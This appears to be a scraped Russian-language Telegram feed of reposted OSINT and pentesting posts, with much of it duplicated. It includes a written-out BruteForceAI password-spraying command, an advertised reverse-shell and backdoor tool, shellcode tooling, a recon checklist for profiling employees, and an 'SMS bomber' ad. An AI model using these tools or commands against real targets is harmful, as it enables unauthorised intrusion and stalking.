Forwarded from C.I.T. Security
Узнаём ВСЁ о человеке через email и логины в соцсетях — нашли детектива для разведки по открытым источникам.
Вбиваете почту или логин и получаете полную сводку:
• Проверяет, где засветился email и когда был зарегистрирован
• Ищет логины в соцсетях, Twitter, GitHub, Reddit и других платформах
• Массово сканирует открытые файлы и базы.
• Имитирует поведение человека, так что антифрод-системы даже не поймут, что их сканируют.
• БЕЗ регистраций, лимитов и платных подписок.
Б Е С П Л А Т Н О
#OSINT
🛜 Крутой VPN | Смс 💣 бомбер | Telegram Stars со скидкой🌟
Вбиваете почту или логин и получаете полную сводку:
• Проверяет, где засветился email и когда был зарегистрирован
• Ищет логины в соцсетях, Twitter, GitHub, Reddit и других платформах
• Массово сканирует открытые файлы и базы.
• Имитирует поведение человека, так что антифрод-системы даже не поймут, что их сканируют.
• БЕЗ регистраций, лимитов и платных подписок.
Б Е С П Л А Т Н О
Интернет помнит всё — user-scanner.
#OSINT
🛜 Крутой VPN | Смс 💣 бомбер | Telegram Stars со скидкой
Please open Telegram to view this post
VIEW IN TELEGRAM
👀1
Forwarded from S.E.Book
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from [PYTHON:TODAY]
Тебе не нужно писать парсеры с нуля, бороться с версткой сайтов и поддерживать инфраструктуру.
Чувак уже собрал 2622 готовых API из 17 категорий — бери и подключай к своему проекту.
Что внутри?
Это фактически “золотая жила” для разработчиков, аналитиков и стартапов.
🔍 Сбор данных — вытаскивать информацию с сайтов, соцсетей, e-commerce платформ.
🤖 Автоматизация — убирать ручную рутину и строить автопроцессы.
📊 Аналитика — мониторить конкурентов, цены, тренды, рынок.
🎯 Лидогенерация — находить контакты и возможности.
🛒 E-commerce мониторинг — отслеживать товары и динамику цен.
📱 Анализ соцсетей — посты, вовлеченность, тренды.
💼 Рынок труда — агрегировать вакансии и зарплаты.
🏠 Недвижимость — собирать объявления и рыночные показатели.
🤖 Интеграция с ИИ — передавать данные в модели, генерировать инсайты.
Иногда самый мощный инструмент — это не код, который ты написал, а код, который уже кто-то сделал за тебя.
#cheatsheet
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Заметки Хакер
🖥 Репозиторий: Parrot Security OS — одна система для всех задач
Parrot Security OS — дистрибутив Linux, основанный на Debian с упором на компьютерную безопасность.
— Предназначен для тестирования системы на проникновение, оценки уязвимостей и ликвидации их последствий, компьютерной криминалистики и анонимного просмотра веб-страниц.
1. Дистрибутив оптимизирован для работы на устройствах с низкой производительностью, имеет минимальные системные требования.
2. Более 600 предустановленных инструментов — полный набор утилит для работы с криптографией, сетями, веб-приложениями и цифровыми расследованиями.
3. Подходит как для начинающих, так и для профессионалов, есть возможность кастомизации под задачи: от добавления новых инструментов до настройки сетей.
⏺ Официальный сайт (https://www.parrotsec.org/)
⏺ Parrot Security OS: ультимативный выбор для пентестинга и цифровой криминалистики (https://www.securitylab.ru/blog/personal/xiaomite-journal/353700.php?ysclid=mm058x47cm446595416)
#OS #Linux #Debian
@hackernews_lib
Parrot Security OS — дистрибутив Linux, основанный на Debian с упором на компьютерную безопасность.
— Предназначен для тестирования системы на проникновение, оценки уязвимостей и ликвидации их последствий, компьютерной криминалистики и анонимного просмотра веб-страниц.
1. Дистрибутив оптимизирован для работы на устройствах с низкой производительностью, имеет минимальные системные требования.
2. Более 600 предустановленных инструментов — полный набор утилит для работы с криптографией, сетями, веб-приложениями и цифровыми расследованиями.
3. Подходит как для начинающих, так и для профессионалов, есть возможность кастомизации под задачи: от добавления новых инструментов до настройки сетей.
⏺ Официальный сайт (https://www.parrotsec.org/)
⏺ Parrot Security OS: ультимативный выбор для пентестинга и цифровой криминалистики (https://www.securitylab.ru/blog/personal/xiaomite-journal/353700.php?ysclid=mm058x47cm446595416)
#OS #Linux #Debian
@hackernews_lib
Forwarded from Интернет-Розыск
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Интернет-Розыск
Инструменты для поиска информации о кредитных картах (OSINT):
📎 https://www.bincodes.com/
📎 https://bincheck.io/
📎 https://www.fraudlabspro.com/credit-card-bin-or-iin-lookup
📎 https://github.com/kahunalu/pwnbin
📎 https://binlist.net/
📎 https://dnschecker.org/credit-card-validator.php
📱 Telegram | 🌐 ВК | 📲 MAX
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Osint Losena
Telegram
🔹 ChatBottle: Telegram (A directory of Telegram bots for various purposes.) — https://chatbottle.co/bots/telegram
🔹 ChatToday (An online chat platform for connecting and chatting with people from around the world.) — https://chattoday.com/
🔹 informer (A Python library for retrieving information about Telegram channels, groups, and users.) — https://github.com/paulpierre/informer
🔹 _IntelligenceX: Telegram (IntelligenceX's Telegram tool for searching and analyzing Telegram data.) — https://intelx.io/tools?tab=telegram
🔹 Lyzem.com (A website to search and find Telegram groups and channels.) — https://lyzem.com/
🔹 Telegram Channels (A directory of Telegram channels covering various topics.) — https://telegramchannels.me/
🔹 Telegram Channels (A platform to discover and browse Telegram channels.) — https://tlgrm.eu/channels
🔹 Telegram Channels Search (A search engine to find Telegram channels by keywords.) — https://xtea.io/ts_en.html
🔹 Telegram Directory (A comprehensive directory of Telegram channels, groups, and bots.) — https://tdirectory.me/
🔹 Telegram Group (A website to search and join Telegram groups.) — https://www.telegram-group.com/
🔹 telegram-history-dump (A Python script to dump the history of a Telegram chat into a SQLite database.) — https://github.com/tvdstaaij/telegram-history-dump
🔹 Telegram-osint-lib (A Python library for performing open-source intelligence (OSINT) on Telegram.) — https://github.com/Postuf/telegram-osint-lib
🔹 Telegram Scraper (A powerful Telegram scraping tool for extracting user information and media.) — https://github.com/th3unkn0n/TeleGram-Scraper
🔹 Tgram.io (A platform to explore and search for Telegram channels, groups, and bots.) — https://tgram.io/
🔹 Tgstat.com (A comprehensive platform for analyzing and tracking Telegram channels and groups.) — https://tgstat.com/
🔹 Tgstat RU (A Russian platform for analyzing and monitoring Telegram channels and groups.) — https://tgstat.ru/
🔹 ChatBottle: Telegram (A directory of Telegram bots for various purposes.) — https://chatbottle.co/bots/telegram
🔹 ChatToday (An online chat platform for connecting and chatting with people from around the world.) — https://chattoday.com/
🔹 informer (A Python library for retrieving information about Telegram channels, groups, and users.) — https://github.com/paulpierre/informer
🔹 _IntelligenceX: Telegram (IntelligenceX's Telegram tool for searching and analyzing Telegram data.) — https://intelx.io/tools?tab=telegram
🔹 Lyzem.com (A website to search and find Telegram groups and channels.) — https://lyzem.com/
🔹 Telegram Channels (A directory of Telegram channels covering various topics.) — https://telegramchannels.me/
🔹 Telegram Channels (A platform to discover and browse Telegram channels.) — https://tlgrm.eu/channels
🔹 Telegram Channels Search (A search engine to find Telegram channels by keywords.) — https://xtea.io/ts_en.html
🔹 Telegram Directory (A comprehensive directory of Telegram channels, groups, and bots.) — https://tdirectory.me/
🔹 Telegram Group (A website to search and join Telegram groups.) — https://www.telegram-group.com/
🔹 telegram-history-dump (A Python script to dump the history of a Telegram chat into a SQLite database.) — https://github.com/tvdstaaij/telegram-history-dump
🔹 Telegram-osint-lib (A Python library for performing open-source intelligence (OSINT) on Telegram.) — https://github.com/Postuf/telegram-osint-lib
🔹 Telegram Scraper (A powerful Telegram scraping tool for extracting user information and media.) — https://github.com/th3unkn0n/TeleGram-Scraper
🔹 Tgram.io (A platform to explore and search for Telegram channels, groups, and bots.) — https://tgram.io/
🔹 Tgstat.com (A comprehensive platform for analyzing and tracking Telegram channels and groups.) — https://tgstat.com/
🔹 Tgstat RU (A Russian platform for analyzing and monitoring Telegram channels and groups.) — https://tgstat.ru/
🐳1👀1
Forwarded from S.E.Book
• Вы ведь знаете, что сервис arXiv.org содержит в себе тонну научных статей на всевозможные темы? Там можно найти очень много полезной информации по различным направлениям, включая ИБ.
• Однако система фильтров не совсем продумана и не очень удобна. Поэтому энтузиасты запилили отдельный сервис, где можно найти любую статью с уклоном в ИБ. Сервис называется CyberSec Research (название говорит само за себя) и он позволяет быстро находить материал с arXiv.org по нужной теме. Переходим, выбираем нужный фильтр, читаем и обучаемся:
➡️ https://research.pwnedby.me/
#Разное
• Однако система фильтров не совсем продумана и не очень удобна. Поэтому энтузиасты запилили отдельный сервис, где можно найти любую статью с уклоном в ИБ. Сервис называется CyberSec Research (название говорит само за себя) и он позволяет быстро находить материал с arXiv.org по нужной теме. Переходим, выбираем нужный фильтр, читаем и обучаемся:
#Разное
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Open Source (Черный Треугольник)
tookie-osint
Tookie — это продвинутый инструмент OSINT (разведки с использованием открытых источников), предназначенный для поиска учетных записей в социальных сетях на основе введенных данных.
Он поддерживает множество платформ, что позволяет проводить всесторонний анализ присутствия пользователя в сети.
Инструмент разработан с учетом удобства использования и может быть полезен как для специалистов по безопасности, так и для исследователей.
Lang: Python
https://github.com/Alfredredbird/tookie-osint
Tookie — это продвинутый инструмент OSINT (разведки с использованием открытых источников), предназначенный для поиска учетных записей в социальных сетях на основе введенных данных.
Он поддерживает множество платформ, что позволяет проводить всесторонний анализ присутствия пользователя в сети.
Инструмент разработан с учетом удобства использования и может быть полезен как для специалистов по безопасности, так и для исследователей.
Lang: Python
https://github.com/Alfredredbird/tookie-osint
Forwarded from Codeby
BruteForceAI - метод перебора с помощью нейросети🧠
📐 Основные особенности
📉 Многопоточное выполнение с синхронизированными задержками
📉 Режимы атаки «Брутфорс» и «Распыление паролей»
📉 Имитация человеческого чувства времени с учетом дрожания и случайности
📉 User-Agent для лучшего обхода защиты
📉 Комплексное ведение журналов с использованием базы данных SQLite.
⬇️ Установка:
0️⃣ Клонирование репозитория:
1️⃣ Установка зависимостей:
2️⃣ Установка LLM модели:
Это всё бесплатно, не требует регистрации или API ключей
3️⃣ Создаём список urls адресов:
➡️ https://authenticationtest.com/simpleFormAuth/
⛓️💥 Запуск:
➡️ Анализ форм авторизации:
➡️ Исполнение атаки:
#pentest #bugbounty #bruteforce #AI
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
BruteForceAI — это инструмент для тестирования на проникновение, который преобразует традиционные атаки методом перебора, интегрируя LLM для интеллектуального анализа форм. Инструмент автоматически идентифицирует селекторы форм входа в систему с помощью ИИ, а затем выполняет сложные многопоточные атаки с использованием моделей поведения, сходных с человеческими.
git clone https://github.com/MorDavid/BruteForceAI
cd BruteForceAI/
pip install -r requirements.txt
curl -fsSL https://ollama.ai/install.sh | sh
ollama pull llama3.2:3b
vim urls.txt
python BruteForceAI.py analyze --urls urls.txt --llm-provider ollama
python BruteForceAI.py attack --urls urls.txt --username users.txt --passwords passwords.txt --threads 10
#pentest #bugbounty #bruteforce #AI
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Codeby
Полностью настраиваемая платформа для составления отчетов о тестировании на проникновение, предназначенная для специалистов в области кибербезопасности.
Устанавливаем дополнительные компоненты, Docker и скачиваем установочный скрипт инструмента:
sudo apt update
sudo apt install -y sed curl openssl uuid-runtime coreutils
curl -fsSL https://get.docker.com | sudo bash
bash <(curl -s https://docs.sysreptor.com/install.sh)
Веб-приложение будет доступно по адресу
http://127.0.0.1:8000/Конструктор отчетов позволяет полностью настроить внешний вид и структуру итоговых отчетов в формате PDF. Ограничений по дизайну нет, поэтому вы можете адаптировать отчеты под свои нужды.
Существует два основных подхода к созданию отчетов:
Существует возможность использовать также и готовые фрагменты HTML и CSS, которые упрощают процесс создания отчетов. Они содержат часто используемые элементы отчетов (титульный лист, верхний и нижний колонтитулы, оглавление, список выводов, приложения и т. д.), которые можно легко настроить в соответствии с конкретными потребностями.
Одна из самых полезных функций для ИБ-специалистов, которая позволяет ускорить дальнейшую подготовку отчетов. Они содержат общие описания результатов и уязвимостей. Таким образом, описав результаты один раз в шаблоне, далее можно использовать их в различных отчетах.
#tools #reports #pentesting
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Osint Losena
** Credentials, leaks & cybercrime intelligence
🔹 Have I Been Pwned (Australia)
▪️ Website: https://haveibeenpwned.com/
▪️ Founded: 2013 г.
▪️ Founder(s): Troy Hunt
🔹 IntelligenceX (Czech Republic)
▪️ Website: https://intelx.io/
▪️ Founded: 2018 г.
▪️ Founder(s): Peter Kleissne
🔹 Leakix (Belgium)
▪️ Website: https://leakix.net/
▪️ Founded: 2021 г.
▪️ Founder(s): Danny Willems, Gregory Boddin
🔹 LeakRadar (France)
▪️ Website: https://leakradar.io/
▪️ Founded: Unknown г.
▪️ Founder(s): Alexandre Vandamme
🔹 Hudson Rock (Israel)
▪️ Website: https://hudsonrock.com/
▪️ Founded: 2020 г.
▪️ Founder(s): Roi Carthy
** Internet exposure & infrastructure intelligence
🔹 Shodan (United States)
▪️ Website: https://www.shodan.io/
▪️ Founded: 2009 г.
▪️ Founder(s): John Matherly
🔹 Censys (United States)
▪️ Website: https://www.censys.com/
▪️ Founded: 2017 г.
▪️ Founder(s): Zakir Durumeric
🔹 Onyphe (France)
▪️ Website: https://www.onyphe.io/
▪️ Founded: 2017 г.
▪️ Founder(s): Patrice Auffret
🔹 Netlas (Armenia)
▪️ Website: https://netlas.io/
▪️ Founded: 2020 г.
▪️ Founder(s): Arthur Kotylevskiy
🔹 ZoomEye (China)
▪️ Website: https://www.zoomeye.ai/
▪️ Founded: 2013 г.
▪️ Founder(s): Not publicly listed
🔹 FOFA (China)
▪️ Website: https://en.fofa.info/
▪️ Founded: 2021 г.
▪️ Founder(s): Not publicly listed
🔹 CriminalIP (South Korea)
▪️ Website: https://www.criminalip.io/
▪️ Founded: 2023 г.
▪️ Founder(s): Byungtak Kang
🔹 VirusTotal (Spain (Google))
▪️ Website: https://www.virustotal.com/
▪️ Founded: 2004 г.
▪️ Founder(s): Bernardo Quintero
🔹 GreyNoise (United States)
▪️ Website: https://greynoise.io/
▪️ Founded: 2017 г.
▪️ Founder(s): Andrew Morris
🔹 PulseDive (United States)
▪️ Website: https://pulsedive.com/
▪️ Founded: 2017 г.
▪️ Founder(s): Dan Scary
🔹 urlscan.io (Germany)
▪️ Website: https://urlscan.io/
▪️ Founded: 2020 г.
▪️ Founder(s): Johannes Gilger
🔹 Hunter.how (Unknown)
▪️ Website: https://hunter.how/
▪️ Founded: Unknown г.
▪️ Founder(s): Not disclosed
🔹 Have I Been Pwned (Australia)
▪️ Website: https://haveibeenpwned.com/
▪️ Founded: 2013 г.
▪️ Founder(s): Troy Hunt
🔹 IntelligenceX (Czech Republic)
▪️ Website: https://intelx.io/
▪️ Founded: 2018 г.
▪️ Founder(s): Peter Kleissne
🔹 Leakix (Belgium)
▪️ Website: https://leakix.net/
▪️ Founded: 2021 г.
▪️ Founder(s): Danny Willems, Gregory Boddin
🔹 LeakRadar (France)
▪️ Website: https://leakradar.io/
▪️ Founded: Unknown г.
▪️ Founder(s): Alexandre Vandamme
🔹 Hudson Rock (Israel)
▪️ Website: https://hudsonrock.com/
▪️ Founded: 2020 г.
▪️ Founder(s): Roi Carthy
** Internet exposure & infrastructure intelligence
🔹 Shodan (United States)
▪️ Website: https://www.shodan.io/
▪️ Founded: 2009 г.
▪️ Founder(s): John Matherly
🔹 Censys (United States)
▪️ Website: https://www.censys.com/
▪️ Founded: 2017 г.
▪️ Founder(s): Zakir Durumeric
🔹 Onyphe (France)
▪️ Website: https://www.onyphe.io/
▪️ Founded: 2017 г.
▪️ Founder(s): Patrice Auffret
🔹 Netlas (Armenia)
▪️ Website: https://netlas.io/
▪️ Founded: 2020 г.
▪️ Founder(s): Arthur Kotylevskiy
🔹 ZoomEye (China)
▪️ Website: https://www.zoomeye.ai/
▪️ Founded: 2013 г.
▪️ Founder(s): Not publicly listed
🔹 FOFA (China)
▪️ Website: https://en.fofa.info/
▪️ Founded: 2021 г.
▪️ Founder(s): Not publicly listed
🔹 CriminalIP (South Korea)
▪️ Website: https://www.criminalip.io/
▪️ Founded: 2023 г.
▪️ Founder(s): Byungtak Kang
🔹 VirusTotal (Spain (Google))
▪️ Website: https://www.virustotal.com/
▪️ Founded: 2004 г.
▪️ Founder(s): Bernardo Quintero
🔹 GreyNoise (United States)
▪️ Website: https://greynoise.io/
▪️ Founded: 2017 г.
▪️ Founder(s): Andrew Morris
🔹 PulseDive (United States)
▪️ Website: https://pulsedive.com/
▪️ Founded: 2017 г.
▪️ Founder(s): Dan Scary
🔹 urlscan.io (Germany)
▪️ Website: https://urlscan.io/
▪️ Founded: 2020 г.
▪️ Founder(s): Johannes Gilger
🔹 Hunter.how (Unknown)
▪️ Website: https://hunter.how/
▪️ Founded: Unknown г.
▪️ Founder(s): Not disclosed
🔥1
Forwarded from Заметки Хакер
🖥 Репозиторий: Sickle — Инструментарий для разработки и анализа полезных нагрузок
Sickle — это Payload Development Kit (PDK) для упрощения процесса создания, тестирования и форматирования шеллкодов.
— Позволяет быстро преобразовывать «сырой» байт-код в различные форматы (C, Python, Perl, Bash и др.), а также включает функции для поиска «плохих» символов и симуляции выполнения кода.
⏺ Ссылка на GitHub (https://github.com/wetw0rk/sickle-pdk)
#Exploit #ShellCode #Payload #RedTeam | Лаборатория хакера (https://max.ru/lab_hack)
@hackernews_lib
Sickle — это Payload Development Kit (PDK) для упрощения процесса создания, тестирования и форматирования шеллкодов.
— Позволяет быстро преобразовывать «сырой» байт-код в различные форматы (C, Python, Perl, Bash и др.), а также включает функции для поиска «плохих» символов и симуляции выполнения кода.
⏺ Ссылка на GitHub (https://github.com/wetw0rk/sickle-pdk)
#Exploit #ShellCode #Payload #RedTeam | Лаборатория хакера (https://max.ru/lab_hack)
@hackernews_lib
Forwarded from Интернет-Розыск
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Пентестинг. Этичный хакинг.
🔎 Пассивная разведка сайта: как собрать инфу, не трогая цель разбираем тему, как и как и обещали в чате
Большинство думает, что пентест начинается со сканеров.
На деле — всё начинается с пассивной разведки.
👉 Пассивная разведка — это сбор информации БЕЗ взаимодействия с целью
(ты не отправляешь запросы на сервер)
Почему это важно?
— тебя не видно в логах
— можно найти уязвимости ещё до атаки
— формируется картина цели
📦 Что можно узнать:
• домены и поддомены
• IP-адреса
• используемые технологии
• открытые данные (утечки, репозитории)
• почты сотрудников
🛠 Инструменты:
— Amass
— theHarvester
— Shodan
— Censys
💡 Пример:
Ты находишь поддомен вида:
А там — тестовая среда без защиты. Уже можно черпать очень много информации.
Также, хотел бы вам посоветовать отличный репозиторий, содержащий перечень инструментов и ресурсов для сбора информации из открытых источников (OSINT).
🪧Информация о компании, которая может быть полезной:
Услуги — чем занимается компания?
Местоположение — где расположена компания?
Размер — какого размера компания?
Структура — какова структура компании и как взаимодействуют различные отделы?
Известность — насколько хорошо известна компания в мире?
Целевая аудитория — кому компания предоставляет свои услуги?
Маркетинг — как компания рекламирует свои услуги?
Активы — все ресурсы компании (офисы, веб-сайты, сетевая инфраструктура и т. д.).
Безопасность — какие меры безопасности предусмотрены для защиты активов компании?
Партнёры — с кем сотрудничает компания?
Вакансии — открыты ли вакансии в компании?
Полезная информация о сотруднике:
Должность — какие роли и обязанности выполняет сотрудник?
Зависимости — какие функциональные или рабочие зависимости существуют у сотрудника?
Контактные данные — номер телефона, адрес электронной почты, место проживания, псевдонимы и т.д.
Операционная система — какую операционную систему использует сотрудник для работы?
Активы — есть ли у сотрудника веб-сайт, блог, аккаунты в социальных сетях или какие-либо специфические приложения?
Интересы — какие у сотрудника личные увлечения, хобби или области интересов вне рабочих обязанностей?
Связи — с кем связан сотрудник?
🎯 Итог:
Пассивная разведка — это не просто этап «перед началом»,
это фундамент всей дальнейшей атаки.
Чем лучше ты собрал информацию на старте —
тем меньше тебе придётся «шуметь» дальше.
👉 Здесь решает не количество инструментов,
а умение связывать факты:
💡 кто хорошо делает OSINT —
тот уже на шаг впереди ещё до первого запроса к цели.
#osint #recon #пассивнаяраздведка
Большинство думает, что пентест начинается со сканеров.
На деле — всё начинается с пассивной разведки.
👉 Пассивная разведка — это сбор информации БЕЗ взаимодействия с целью
(ты не отправляешь запросы на сервер)
Почему это важно?
— тебя не видно в логах
— можно найти уязвимости ещё до атаки
— формируется картина цели
📦 Что можно узнать:
• домены и поддомены
• IP-адреса
• используемые технологии
• открытые данные (утечки, репозитории)
• почты сотрудников
🛠 Инструменты:
— Amass
— theHarvester
— Shodan
— Censys
💡 Пример:
Ты находишь поддомен вида:
dev.example.com
А там — тестовая среда без защиты. Уже можно черпать очень много информации.
Также, хотел бы вам посоветовать отличный репозиторий, содержащий перечень инструментов и ресурсов для сбора информации из открытых источников (OSINT).
🪧Информация о компании, которая может быть полезной:
Услуги — чем занимается компания?
Местоположение — где расположена компания?
Размер — какого размера компания?
Структура — какова структура компании и как взаимодействуют различные отделы?
Известность — насколько хорошо известна компания в мире?
Целевая аудитория — кому компания предоставляет свои услуги?
Маркетинг — как компания рекламирует свои услуги?
Активы — все ресурсы компании (офисы, веб-сайты, сетевая инфраструктура и т. д.).
Безопасность — какие меры безопасности предусмотрены для защиты активов компании?
Партнёры — с кем сотрудничает компания?
Вакансии — открыты ли вакансии в компании?
Полезная информация о сотруднике:
Должность — какие роли и обязанности выполняет сотрудник?
Зависимости — какие функциональные или рабочие зависимости существуют у сотрудника?
Контактные данные — номер телефона, адрес электронной почты, место проживания, псевдонимы и т.д.
Операционная система — какую операционную систему использует сотрудник для работы?
Активы — есть ли у сотрудника веб-сайт, блог, аккаунты в социальных сетях или какие-либо специфические приложения?
Интересы — какие у сотрудника личные увлечения, хобби или области интересов вне рабочих обязанностей?
Связи — с кем связан сотрудник?
🎯 Итог:
Пассивная разведка — это не просто этап «перед началом»,
это фундамент всей дальнейшей атаки.
Чем лучше ты собрал информацию на старте —
тем меньше тебе придётся «шуметь» дальше.
👉 Здесь решает не количество инструментов,
а умение связывать факты:
один поддомен → один email → один сотрудник → одна точка входа
💡 кто хорошо делает OSINT —
тот уже на шаг впереди ещё до первого запроса к цели.
#osint #recon #пассивнаяраздведка
Forwarded from Пентестинг. Этичный хакинг.
🔎 Мини-алгоритм пассивной разведки (OSINT)
Чтобы не тонуть в инструментах — я постарался обобщить все в мини-роудмап:
1️⃣ Определи цель
— домен / компания / ник
— зафиксируй все варианты (зеркала, поддомены, похожие названия)
2️⃣ Собери поверхность атаки
— домены и поддомены
— IP и хосты
— связанные сервисы
(через Amass, Censys)
3️⃣ Определи технологии
— CMS / фреймворки
— версии сервисов
— сторонние интеграции
4️⃣ Ищи открытые источники
— репозитории
— утечки
— документы
— кэш поисковиков
(через theHarvester, Shodan)
5️⃣ Собери людей и доступы
— сотрудники
— почты
— роли
— соцсети
6️⃣ Найди слабые точки
— dev / test / staging
— старые версии сайтов
— забытые сервисы
— лишняя информация в открытом доступе
7️⃣ Сделай pivot
— email → аккаунты
— домен → поддомены
— человек → компания → инфраструктура
🎯 Итог:
Пассивка — это не просто сбор данных,
а последовательная сборка пазла.
#osint #recon #пассивнаяраздведка
Чтобы не тонуть в инструментах — я постарался обобщить все в мини-роудмап:
1️⃣ Определи цель
— домен / компания / ник
— зафиксируй все варианты (зеркала, поддомены, похожие названия)
2️⃣ Собери поверхность атаки
— домены и поддомены
— IP и хосты
— связанные сервисы
(через Amass, Censys)
3️⃣ Определи технологии
— CMS / фреймворки
— версии сервисов
— сторонние интеграции
4️⃣ Ищи открытые источники
— репозитории
— утечки
— документы
— кэш поисковиков
(через theHarvester, Shodan)
5️⃣ Собери людей и доступы
— сотрудники
— почты
— роли
— соцсети
6️⃣ Найди слабые точки
— dev / test / staging
— старые версии сайтов
— забытые сервисы
— лишняя информация в открытом доступе
7️⃣ Сделай pivot
— email → аккаунты
— домен → поддомены
— человек → компания → инфраструктура
🎯 Итог:
Пассивка — это не просто сбор данных,
а последовательная сборка пазла.
#osint #recon #пассивнаяраздведка
Forwarded from Интернет-Розыск
Программируемая поисковая система Google PSE, ранее известная как Custom Search Engine (CSE), — это малоиспользуемый, но мощный инструмент для OSINT-расследований.
📎 https://programmablesearchengine.google.com/
PSE (Personal Service Except — поисковая оптимизация) — это ваша собственная, тщательно отобранная версия Google. Вместо поиска по всему интернету, она ищет только на конкретных сайтах, доменах или страницах, которые вы выберете. Google занимается индексированием в фоновом режиме, а вы определяете область поиска.
Подборки Google PSE для OSINT:
📎 https://github.com/paulpogoda/OSINT-CSE
📎 https://github.com/The-Osint-Toolbox/Custom-Search-Engines
📎 https://www.freesourcingtools.com/google-cse
📎 https://booleanstrings.com/all-the-40-forty-custom-search-engines/
📱 Telegram | 🌐 ВК | 📲 MAX
PSE (Personal Service Except — поисковая оптимизация) — это ваша собственная, тщательно отобранная версия Google. Вместо поиска по всему интернету, она ищет только на конкретных сайтах, доменах или страницах, которые вы выберете. Google занимается индексированием в фоновом режиме, а вы определяете область поиска.
Подборки Google PSE для OSINT:
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Пентестинг. Этичный хакинг.
⚔️ Активная разведка сайта: когда ты начинаешь “стучаться” в цель
Если пассивка — это наблюдение,
то активная разведка — это уже действие.
👉 Активная разведка — это взаимодействие с целью
(ты отправляешь запросы → система может тебя заметить)
Почему это важно?
— получаешь реальные ответы от сервера
— находишь уязвимости, которые не видны в OSINT
— проверяешь гипотезы, собранные на пассивке
⚠️ Но есть нюанс:
— ты оставляешь следы в логах
— можешь триггернуть WAF / IDS
— без разрешения это может быть незаконно
📦 Что сюда входит:
• сканирование портов
• перебор директорий и файлов
• fuzzing параметров
• анализ ответов сервера
• поиск точек входа
🛠 Инструменты:
— Nmap
— Gobuster
— ffuf
— Burp Suite
💡 Пример:
Ты находишь поддомен через пассивку →
Дальше:
— сканируешь порты
— находишь admin-панель
— проверяешь параметры
И вот тут уже начинаются реальные уязвимости
🎯 Важно:
Активка без пассивки = стрельба в темноту
Активка после пассивки = точечный удар
#osint #активнаяраздведка
Если пассивка — это наблюдение,
то активная разведка — это уже действие.
👉 Активная разведка — это взаимодействие с целью
(ты отправляешь запросы → система может тебя заметить)
Почему это важно?
— получаешь реальные ответы от сервера
— находишь уязвимости, которые не видны в OSINT
— проверяешь гипотезы, собранные на пассивке
⚠️ Но есть нюанс:
— ты оставляешь следы в логах
— можешь триггернуть WAF / IDS
— без разрешения это может быть незаконно
📦 Что сюда входит:
• сканирование портов
• перебор директорий и файлов
• fuzzing параметров
• анализ ответов сервера
• поиск точек входа
🛠 Инструменты:
— Nmap
— Gobuster
— ffuf
— Burp Suite
💡 Пример:
Ты находишь поддомен через пассивку →
test.example.com
Дальше:
— сканируешь порты
— находишь admin-панель
— проверяешь параметры
И вот тут уже начинаются реальные уязвимости
🎯 Важно:
Активка без пассивки = стрельба в темноту
Активка после пассивки = точечный удар
#osint #активнаяраздведка
Forwarded from Пентестинг. Этичный хакинг.
🔎 Мини-алгоритм активной разведки (OSINT)
1️⃣ Берёшь данные с пассивки
— домены, поддомены
— IP и сервисы
— найденные dev/test точки
2️⃣ Проверяешь доступность
— какие хосты отвечают
— какие порты открыты
— какие сервисы реально доступны
👉 Отсекаешь всё лишнее
3️⃣ Определяешь сервисы
— сайт, API, админка?
— какие технологии используются
— есть ли WAF / защита
👉 Понимаешь, с чем имеешь дело
4️⃣ Ищешь скрытые директории
— /admin
— /login
— /api
— /backup
— /dev
👉 Очень часто здесь лежит самое интересное
5️⃣ Анализируешь ответы сервера
— коды ответов (200/403/404)
— размер ответа
— заголовки
— поведение при разных запросах
👉 Ищешь аномалии
6️⃣ Проверяешь точки ввода
— формы
— параметры
— API
— загрузки файлов
👉 Смотришь, как система обрабатывает данные
7️⃣ Тестируешь поведение
— нестандартные значения
— разные методы
— изменение запросов
👉 Ловишь ошибки логики
8️⃣ Выделяешь точки входа
— админки
— авторизация
— API
— старые сервисы
👉 Формируешь векторы атаки
🎯 Вывод:
Активная разведка — это не “запустить сканер и ждать”.
Это последовательная работа с гипотезами,
где каждый шаг сужает область поиска.
#osint #активнаяраздведка
1️⃣ Берёшь данные с пассивки
— домены, поддомены
— IP и сервисы
— найденные dev/test точки
2️⃣ Проверяешь доступность
— какие хосты отвечают
— какие порты открыты
— какие сервисы реально доступны
👉 Отсекаешь всё лишнее
3️⃣ Определяешь сервисы
— сайт, API, админка?
— какие технологии используются
— есть ли WAF / защита
👉 Понимаешь, с чем имеешь дело
4️⃣ Ищешь скрытые директории
— /admin
— /login
— /api
— /backup
— /dev
👉 Очень часто здесь лежит самое интересное
5️⃣ Анализируешь ответы сервера
— коды ответов (200/403/404)
— размер ответа
— заголовки
— поведение при разных запросах
👉 Ищешь аномалии
6️⃣ Проверяешь точки ввода
— формы
— параметры
— API
— загрузки файлов
👉 Смотришь, как система обрабатывает данные
7️⃣ Тестируешь поведение
— нестандартные значения
— разные методы
— изменение запросов
👉 Ловишь ошибки логики
8️⃣ Выделяешь точки входа
— админки
— авторизация
— API
— старые сервисы
👉 Формируешь векторы атаки
🎯 Вывод:
Активная разведка — это не “запустить сканер и ждать”.
Это последовательная работа с гипотезами,
где каждый шаг сужает область поиска.
#osint #активнаяраздведка
Forwarded from Codeby
Tyrant
📐 Основные характеристики:
📉 Reverse shell: позволяет злоумышленнику инициировать сеанс командной оболочки с указанным UID пользователя, получая соответствующие привилегии.
📉 Внедрение и сохранение бэкдора: внедряет бэкдор в целевую систему и обеспечивает сохранение контроля даже после перезагрузки системы.
📉 Загрузка веб-оболочки Tyrant: загружает и запускает обратную оболочку Tyrant через веб-доступ.
📉 Шифрование и поддельные протоколы: использует поддельные токены JWT и зашифрованную связь для обхода обнаружения системы безопасности.
🖱 Восстановление по SSH: позволяет злоумышленнику повторно подключиться и восстановить бэкдор через SSH.
⬇️ Установка:
0️⃣ Клонирование репозитория и переход в рабочую директорию:
1️⃣ Установка зависимостей:
2️⃣ Компиляция бинарного файла:
⛓️💥 Запуск:
#web
